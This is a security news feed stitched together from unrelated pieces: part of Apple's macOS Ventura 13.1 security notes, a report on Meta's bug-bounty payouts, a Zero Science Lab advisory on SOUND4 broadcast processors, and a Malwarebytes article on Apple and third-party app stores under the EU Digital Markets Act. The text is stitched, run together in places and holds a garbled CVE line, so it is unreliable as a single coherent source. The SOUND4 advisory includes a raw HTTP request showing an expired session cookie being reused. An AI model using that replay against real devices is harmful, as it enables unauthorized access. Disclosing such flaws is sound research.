Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

WebKit Bugzilla: 245521  
CVE-2022-42867: Maddie Stone of Google Project Zero

**WebKit**

Available for: macOS Ventura

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory consumption issue was addressed with improved memory handling.

WebKit Bugzilla: 245466  
CVE-2022-46691: an anonymous researcher

**WebKit**

Available for: macOS Ventura

Impact: Processing maliciously crafted web content may bypass Same Origin Policy

Description: A logic issue was addressed with improved state management.

WebKit Bugzilla: 246783  
CVE-2022-46692: KirtiKumar Anandrao Ramchandani

**WebKit**

Available for: macOS Ventura

Impact: Processing maliciously crafted web content may result in the disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2022-42852: hazbinhotel working with Trend Micro Zero Day Initiative

**WebKit**

Available for: macOS Ventura

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

WebKit Bugzilla: 246942  
CVE-2022-46696: Samuel Groß of Google V8 Security

WebKit Bugzilla: 247562  
CVE-2022-46700: Samuel Groß of Google V8 Security

**WebKit**

Available for: macOS Ventura

Impact: Processing maliciously crafted web content may disclose sensitive user information

Description: A logic issue was addressed with improved checks.

CVE-2022-46698: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs & DNSLab, Korea Univ.

**WebKit**

Available for: macOS Ventura

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved state management.

WebKit Bugzilla: 247420  
CVE-2022-46699: Samuel Groß of Google V8 Security

WebKit Bugzilla: 244622  
CVE-2022-42863: an anonymous researcher

**WebKit**

Available for: macOS Ventura

Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.1.

Description: A type confusion issue was addressed with improved state handling.

WebKit Bugzilla: 248266  
CVE-2022-42856: Clément Lecigne of Google's Threat Analysis Group

**xar**

Available for: macOS Ventura

Impact: Processing a maliciously crafted package may lead to arbitrary code execution

Description: A type confusion issue was addressed with improved checks.

CVE-2022-42841: Thijs Alkemade (@xnyhps) of Computest Sector 7

CVE-2022-46701: About the security content of macOS Ventura 13.1

Facebook's parent company has also expanded bug-bounty payouts to include Oculus and other "metaverse" gadgets for AR/VR.

Facebook parent Meta will pay up to $300,000 to security researchers who report exploitable remote code execution (RCE) vulnerabilities in the Android and iOS versions of Facebook, Messenger, Instagram, and WhatsApp.

The actual amount will vary depending on the amount of user interaction — measured in "clicks" — to trigger the flaw. To qualify for the maximum payout, a security researcher would need to include working proof-of-concept code for exploiting the flaw in any of the current or previous two versions of Android or a currently supported version of Apple's iOS.

**Updated Payout Guidelines**

In addition to the updated guidelines for mobile RCE, Meta this week also released new payout guidelines for account takeover (ATO) and two-factor authentication (2FA) bypass vulnerabilities. 

The maximum payout for a 2FA flaw is $20,000, while that for an ATO vulnerability is $130,000. Here again, the actual payout will depend on the ease with which an attacker can exploit a vulnerability. For instance, a researcher who reports and demonstrates an exploitable zero-click authentication bug can garner the $130,000 payout, while a one-click ATO will fetch a $50,000 reward.

The company also introduced new payout guidelines for bugs reported in its Meta Quest Pro and other virtual reality (VR) technologies, making Meta one of the first companies to set rewards for vulnerabilities in VR and mixed-reality devices.

Meta's updated payout guidelines for mobile RCE bugs and its new rewards for ATO and authentication bypass flaws are the latest tweaks to the company's nearly 11-year bug-bounty program. Under it, Meta has so far paid some $16 million to freelance researchers from around the world who have reported bugs in its online platforms.

The latest changes are part of the company's effort to ensure that the bug bounties Meta offers and the products that are covered under the program remain aligned with evolving threats, says Neta Oren, the security engineer who leads Meta's bug-bounty initiative.

"Every year, we continue to learn new things about how to best engage with the community and adjust our program to address some of the most impactful areas in evolving spaces," Oren says. "Our program has grown from just covering Facebook's Web page in 2011 to now cover all of our Web and mobile clients across our family of apps, including Instagram, WhatsApp, Oculus, Workplace, and more."

**Crowdsourced Cybersecurity**

Meta's bug-bounty program is similar to those of the hundreds of other companies that have implemented crowdsourced vulnerability-hunting programs in recent years. Many security experts consider these programs as a relatively cost-effective way of finding vulnerabilities that internal security teams might have missed. The programs give ethical hackers a structured way to find and report vulnerabilities they might discover on a website or Web application — and receive a reward for their effort.

Many of these programs include Safe Harbor clauses that exempt security researchers working under the bug-bounty program from legal liability for their research. For vendors, the programs offer a way to get top-notch security researchers to essentially conduct penetration tests on their platforms in a relatively cost-effective manner. Importantly, it also gives them a better shot at ensuring that researchers report a vulnerability directly to them rather than disclosing it publicly before a fix is available, or worse, selling it to a gray-market purchaser.

Some, though, have cautioned about such programs collapsing under the volume of bug reports that researchers can submit, especially if the organization's security team isn't mature enough or ready enough to respond to them.

**Large Volume of Reports**

Since Facebook launched its bug-bounty program in 2011, the company has received more than 170,000 reports from bug hunters around the world. The company identified more than 8,500 of those reports to be valid vulnerability disclosures, for which it has paid a total of $16 million in rewards. 

So far this year, Meta has received some 10,000 reports from researchers in 45 countries and issued bounties totaling more than $2 million for 750 or so identified vulnerabilities. India, Nepal, and Tunisia topped the list of countries in terms of where bounties were awarded so far this year.

"One benefit of having a 10-plus-year bug-bounty program is that some of our researchers have dedicated years to hunting on our platform and have become extremely familiar with our products and services," Oren says. "These researchers are able to dig beyond surface-level issues and help us identify impactful but niche bugs that the broader community wouldn't necessarily know to look for."

One example of impactful-but-niche was an account takeover and 2FA bypass chain issue that a long-time security researcher reported this year in Facebook's phone number-based account recovery flow; the vulnerability could have allowed an attacker to reset passwords and take over accounts unprotected by 2FA. Meta awarded $163,000 for the discovery.

Meta Ponies Up $300K Bounty for Zero-Click Mobile RCE Bugs in Facebook

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffers from an insufficient session expiration vulnerability.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Insufficient Session ExpirationVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: 4.1.102Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: The application suffers an insufficient session expiration. Thisoccurs when the web application permits an attacker to reuse old sessioncredentials or session IDs for authorization. Insufficient session expirationincreases the device's exposure to attacks that can steal or reuse user'ssession identifiers.Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5724Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5724.php26.09.2022--Session valid after 96 hours:POST /checklogin.php HTTP/1.1Host: RADIOCookie: PHPSESSID=q9rooqkl3kl20aianmveimu23q; monitor-mp3-bitrate=128; monitor-volume=1; settings_accordion_active=3; netdiagsaccordion_last=0Content-Length: 34Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8"Accept: */*Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Origin: https://RADIOSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://RADIO/linkandshare.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: closesession=q9rooqkl3kl20aianmveimu23qHTTP/1.1 200 OKDate: Sat, 03 Jan 1970 11:13:19 GMTServer: Apache/2.4.25 (Unix) OpenSSL/1.0.2k PHP/7.1.1X-Powered-By: PHP/7.1.1Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheVary: User-AgentContent-Length: 1Connection: closeContent-Type: text/html; charset=UTF-80

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x Insufficient Session Expiration

Categories: Apple
Categories: News
Tags: Apple

Tags:  DMA

Tags:  Digital Markets Act

Tags:  European Commission

Tags:  EU

Tags:  iPhone

Tags:  iPad

Tags:  Big Tech

Tags:  App Store

More freedom and greater risks could be on the cards for European users.



(Read more...)




The post Is Apple about to embrace third-party app stores? appeared first on Malwarebytes Labs.

On Tuesday, Bloomberg reported that Apple is preparing to allow access to third-party app stores on all iPhone and iPad devices owned by EU users, in anticipation of a new EU competition law coming into force in mid-2024. If the reporting is correct, then in future users in the EU will no longer be confined to the "walled garden" of the App Store and will be free to download apps from stores owned by companies other than Apple. If it happens, the move will bring both increased freedom and increased security risks.

**The Digital Markets Act**

The Digital Markets Act (DMA), also referred to as Regulation (EU) 2022/1925, was introduced by the European Commission, the executive arm of the EU, in December 2020 and was recently signed into law, in September 2022. It aims to "ban certain practices used by large platforms acting as 'gatekeepers' and enable the Commission to carry out market investigations and sanction non-compliant behaviour". 

It targets the most prominent "Big Tech" companies operating within the EU. The Commission has yet to provide a list of gatekeepers, but Apple is expected to be one of them.

A gatekeeper is defined by the DMA as a platform operating on one or more of the world's digital core services, which includes advertising, search, and social networking, in at least three EU countries and satisfies the following criteria:

*   Has an annual turnover of 7.5B EUR ($8.2B) or a market capitalization of 75B EUR ($82B)
*   Provides certain services, such as browsers, messengers, and social media, that have 45M EU users per month minimum and 10,000 annual business users

Non-compliant gatekeepers could be subjected to fines of at least 10 percent of their previous year's annual worldwide turnover (20 percent for repeat offenders). Systemic violations could lead to a ban on acquiring other companies for a particular time.

"The agreement ushers in a new era of tech regulation worldwide. The Digital Markets Act puts an end to the ever-increasing dominance of Big Tech companies," said Andreas Schwab, an Internal Market and Consumer Protection Committee of the Parliament rapporteur. "From now on, they must show that they also allow for fair competition on the internet. The new rules will help enforce that basic principle. Europe is thus ensuring more competition, more innovation and more choice for users."

"As the European Parliament, we have made sure that the DMA will deliver tangible results immediately: consumers will get the choice to use the core services of Big Tech companies such as browsers, search engines or messaging, and all that without losing control over their data."

**New laws, new risks**

Indeed, the DMA could usher in new business opportunities for small businesses and app developers, and give European users access to more apps and different pricing models. But with change comes challenges. Apple's move to open the platform for other app stores threatens its services business and could introduce security risks.

Apple told Reuters that "allowing sideloading, bypassing its App Store, exposes users to security and privacy dangers". On the other hand, some regulators and Apple critics say these are overblown.

Thomas Reed, Malwarebytes Director for Mac and Mobile, disagrees, and thinks Apple may take extra steps to beef up security around apps from third-party stores.

> There's a lot of potential for this to undermine Apple's security, so I'd expect there to be a lot of effort put into securing it. It's possible third-party app stores, and apps downloaded from them, will have to run in some kind of sandbox that limits what they're able to do,”

Alternatively, says Reed, Apple might let users embrace a less secure environment.

> It's also possible Apple will create a less-secure mode, somewhat like Android's developer mode, that users have to turn on explicitly. Although I don't think this is likely and seems more out-of-character for Apple, as it would open up the device to more abuse.

He sees problems with potentially unwanted programs (PUPs) either way though.

> Regardless of how they do it, I expect to see a big problem with PUPs in those third-party stores. Apple already has a problem policing its store, and they have way more resources to throw at it than any third-party would. I also see the potential for bogus third-party stores, not just app scams.
> 
> We'll be entering a whole new world where users will be able to download from numerous untrustworthy sources. I predict security issues will abound as a result.

**We don't just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Tag

#apple